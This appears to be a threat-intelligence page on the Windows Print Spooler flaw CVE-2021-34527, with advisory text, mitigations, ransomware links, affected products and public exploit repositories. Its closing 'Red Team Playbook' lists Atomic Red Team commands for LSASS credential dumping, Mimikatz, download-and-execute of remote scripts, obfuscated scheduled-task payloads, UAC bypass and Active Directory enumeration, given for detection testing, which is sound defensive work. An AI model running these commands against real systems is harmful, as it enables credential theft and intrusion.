CVE-2021-34527
Overview
This vulnerability is a remote code execution flaw caused by improper privileged file operations within the Windows Print Spooler service. The root cause lies in the service's failure to correctly validate and restrict file operations performed with elevated SYSTEM privileges, allowing unauthorized manipulation of system files. The affected component is the Windows Print Spooler service across multiple Windows 10 versions and Windows Server editions.
Vulnerability Description
<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p> <p>UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.</p> <p>In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (<strong>Note</strong>: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):</p> <ul> <li>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint</li> <li>NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)</li> <li>UpdatePromptSettings = 0 (DWORD) or not defined (default setting)</li> </ul> <p><strong>Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.</strong></p> <p>UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also <a href="https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7">KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates</a>.</p> <p>Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.</p>
Impact
An attacker with low-privileged access can execute arbitrary code with SYSTEM-level privileges remotely without user interaction. This enables installation of programs, modification or deletion of data, and creation of new accounts with full user rights. Such control facilitates full system compromise, lateral movement within networks, and potential data breaches or persistent backdoors on affected systems.
Solution
Apply the security updates released by Microsoft on and after July 6, 2021, specifically targeting Windows 10 versions 1507, 1607, 1809, 20H2, 21H2, and Windows Server 2012 and 2016. Refer to Microsoft Security Advisory KB5005010 and the Microsoft Security Response Center portal for detailed patch installation instructions. Additionally, verify that the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint have NoWarningNoElevationOnInstall and UpdatePromptSettings set to 0 or not defined to maintain secure configuration.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
FIN12
|
MEDIUM | — | correlation_misp |
|
Vice Society
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
A significant remote code execution vulnerability exists within the Windows Print Spooler service, which is responsible for managing print jobs on Windows operating systems. This flaw arises from improper handling of privileged file operations, allowing an attacker to execute arbitrary code with SYSTEM-level privileges. The implications of this vulnerability are severe, as it grants an attacker full control over the affected system, enabling them to install malicious software, manipulate or delete sensitive data, and create new user accounts with elevated rights. The vulnerability affects a wide range of Windows products, including various versions of Windows 10, Windows Server editions, and older operating systems like Windows 7 and Windows 8.1.
Attack vectors for exploiting this vulnerability are diverse and can be executed remotely, making it particularly dangerous. An attacker could leverage this flaw by sending specially crafted print jobs to the Print Spooler service, which could trigger the execution of malicious code. This could be done over a network, allowing an attacker to compromise systems without physical access. Additionally, the vulnerability has been linked to the broader "PrintNightmare" exploit, which further complicates the threat landscape. Given the prevalence of the Print Spooler service in enterprise environments, the potential for widespread exploitation is significant, especially in organizations that rely heavily on networked printing solutions.
The real-world impact of this vulnerability can be catastrophic for businesses. Successful exploitation could lead to unauthorized access to critical systems, data breaches, and significant operational disruptions. Organizations may face financial losses due to remediation efforts, legal liabilities, and damage to their reputation. Furthermore, the potential for data theft or ransomware deployment increases the stakes, as attackers could leverage compromised systems to gain access to sensitive information or hold data hostage. The high CVSS score of 8.8 underscores the urgency for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to apply the latest security updates provided by Microsoft, as these patches address the underlying issues within the Print Spooler service. Additionally, organizations should review and modify relevant registry settings to ensure that they are configured securely. Specifically, ensuring that the NoWarningNoElevationOnInstall setting is set to zero or left undefined is essential to prevent exploitation. Regular security assessments, including vulnerability scanning and penetration testing, can help identify any systems that remain unpatched or misconfigured. Lastly, organizations should consider disabling the Print Spooler service on systems where it is not necessary, thereby reducing the attack surface.
In conclusion, the remote code execution vulnerability in the Windows Print Spooler service poses a significant threat to organizations using affected Windows products. The ability for attackers to execute arbitrary code with SYSTEM privileges highlights the critical need for immediate action to secure systems. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this serious threat. The proactive management of vulnerabilities, combined with a strong security posture, is essential in today’s evolving threat landscape.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-34527, coinciding with the emergence of new proof-of-concept tools that facilitate scanning and exploitation across networked hosts. This expansion of the exploit landscape has contributed to a broader range of ransomware groups leveraging the vulnerability, including recent associations with additional actors beyond the previously known clusters. Our telemetry indicates that adversaries are increasingly integrating these tools into their operational playbooks, amplifying the risk of successful compromise. Although the EPSS score remains high and stable, the qualitative surge in activity and diversification of threat actors underscore an elevated threat environment. For defenders, this signals a heightened urgency to monitor for exploitation attempts and to anticipate more frequent and varied ransomware campaigns exploiting this vulnerability. Overall, the threat level has intensified due to both the increased exploitation velocity and the broadened adversary engagement.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-34527, reflected by a notable uptick in telemetry signals and a near-maximal EPSS score increase. This intensification coincides with the sustained presence of ransomware groups such as FIN12 and Vice Society, which continue to leverage this vulnerability within their campaigns. Additionally, the emergence of new proof-of-concept exploits and publicly available scripts aimed at both scanning and mitigating the vulnerability has lowered the barrier for adversaries to weaponize this flaw. For defenders, this evolving landscape signifies an increased likelihood of opportunistic and targeted attacks exploiting the Windows Print Spooler service, amplifying the risk of privilege escalation and system compromise. Consequently, the threat level associated with CVE-2021-34527 has escalated from high to critical, underscoring the urgency for vigilant monitoring and proactive threat detection to counteract the expanding adversary engagement.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Windows 10 1507 | All |
cpe:2.3:o:microsoft:windows_10_1507:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1607 | All |
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 1809 | All |
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 20h2 | All |
cpe:2.3:o:microsoft:windows_10_20h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 21h2 | All |
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 10 22h2 | All |
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 21h2 | All |
cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 11 22h2 | All |
cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows 7 | N/A |
cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
|
|
|
Microsoft | Windows 8.1 | N/A |
cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Rt 8.1 | N/A |
cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | N/A |
cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2008 | r2 |
cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*
|
|
|
Microsoft | Windows Server 2012 | N/A |
cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2012 | r2 |
cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2016 | All |
cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2019 | All |
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 2022 | All |
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*
|
|
|
Microsoft | Windows Server 20h2 | All |
cpe:2.3:o:microsoft:windows_server_20h2:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Print Spooler Remote DLL Injection
exploits/windows/dcerpc/cve_2021_1675_printnightmare
|
Zhiniang Peng, Xuefeng Li, Zhipeng Huo +5 | Unknown | - | View |
GitHub PoCs (27)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
byt3bl33d3r/ItWasAllADream
A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE
|
byt3bl33d3r | 801 | 118 | 2021-07-05 | View |
|
JohnHammond/CVE-2021-34527
|
JohnHammond | 318 | 75 | 2021-07-02 | View |
|
nemo-wq/PrintNightmare-CVE-2021-34527
PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits
|
nemo-wq | 174 | 42 | 2021-07-03 | View |
|
m8sec/CVE-2021-34527
PrintNightmare (CVE-2021-34527) PoC Exploit
|
m8sec | 118 | 19 | 2022-08-23 | View |
|
hackerhouse-opensource/cve-2021-34527
CVE-2021-34527 AddPrinterDriverEx() Privilege Escalation
|
hackerhouse-opensource | 23 | 11 | 2022-09-05 | View |
|
thomas-lauer/PrintNightmare
Kritische Sicherheitslücke PrintNightmare CVE-2021-34527
|
thomas-lauer | 2 | 4 | 2021-07-02 | View |
|
CnOxx1/CVE-2021-34527-1675
Cve-2021-1675 or cve-2021-34527? Detailed analysis and exploitation of windows print spooler 0day vulnerability!!!
|
CnOxx1 | 5 | 1 | 2021-07-04 | View |
|
dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC
|
dywhoami | 3 | 1 | 2021-07-09 | View |
|
Tomparte/PrintNightmare
To fight against Windows security breach PrintNightmare! (CVE-2021-34527, CVE-2021-1675)
|
Tomparte | 3 | 0 | 2021-07-28 | View |
|
rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint
Workaround for Windows Print Spooler Remote Code Execution Vulnerability(CVE-2021-34527). See: https://msrc.microsoft.co...
|
rdboboia | 2 | 0 | 2021-07-05 | View |
|
powershellpr0mpt/PrintNightmare-CVE-2021-34527
How to fix the PrintNightmare vulnerability
|
powershellpr0mpt | 2 | 0 | 2021-07-07 | View |
|
0xirison/PrintNightmare-Patcher
A patch for PrintNightmare vulnerability that occurs to print spooler service for Windows machines [CVE-2021-34527]
|
0xirison | 2 | 0 | 2021-07-12 | View |
|
DenizSe/CVE-2021-34527
Small Powershell Script to detect Running Printer Spoolers on Domain Controller
|
DenizSe | 0 | 2 | 2021-07-01 | View |
|
Amaranese/CVE-2021-34527
|
Amaranese | 1 | 0 | 2021-12-13 | View |
|
cyb3rpeace/CVE-2021-34527
|
cyb3rpeace | 1 | 0 | 2022-06-24 | View |
|
AUSK1LL9/CVE-2021-34527
CVE-2021-34527 is a critical remote code execution and local privilege escalation vulnerability dubbed "PrintNightmare."
|
AUSK1LL9 | 0 | 1 | 2025-05-21 | View |
|
d0rb/CVE-2021-34527
CVE-2021-34527 PrintNightmare PoC
|
d0rb | 0 | 1 | 2023-08-20 | View |
|
Eutectico/Printnightmare
Fix for PrintNightmare CVE-2021-34527
|
Eutectico | 0 | 1 | 2021-07-09 | View |
|
AlDawli/CVE-2021-34527-
PrintNightmare Report
|
AlDawli | 0 | 0 | 2026-05-27 | View |
|
fengjixuchui/CVE-2021-34527-1675
Cve-2021-1675 or cve-2021-34527? Detailed analysis and exploitation of windows print spooler 0day vulnerability!!!
|
fengjixuchui | 0 | 0 | 2021-07-13 | View |
|
geekbrett/CVE-2021-34527-PrintNightmare-Workaround
This simple PowerShell script is in response to the "PrintNightmare" vulnerability. This was designed to give a end user...
|
geekbrett | 0 | 0 | 2021-07-05 | View |
|
vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527
Simple batch script to disable the Microsoft Print Spooler service from system
|
vinaysudheer | 0 | 0 | 2021-07-07 | View |
|
WidespreadPandemic/CVE-2021-34527_ACL_mitigation
Mitigation for CVE-2021-34527 RCE by setting WRITE ACLs
|
WidespreadPandemic | 0 | 0 | 2021-07-08 | View |
|
glorisonlai/printnightmare
CVE-2021-34527 implementation
|
glorisonlai | 0 | 0 | 2021-07-08 | View |
|
syntaxbearror/PowerShell-PrintNightmare
A collection of scripts to help set the appropriate registry keys for CVE-2021-34527
|
syntaxbearror | 0 | 0 | 2021-07-09 | View |
|
TieuLong21Prosper/detect_bruteforce
detect bruteforce using for cve-2021-34527
|
TieuLong21Prosper | 0 | 0 | 2023-10-28 | View |
|
Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784
|
Hirusha-N | 0 | 0 | 2024-06-25 | View |
Ransomware Groups 2
Threat Feed
25 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Cobalt Strike, FileZilla, PsExec (36 known victims)
Ransomware group known to exploit this vulnerability (26 known victims)
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability (62 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
76 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
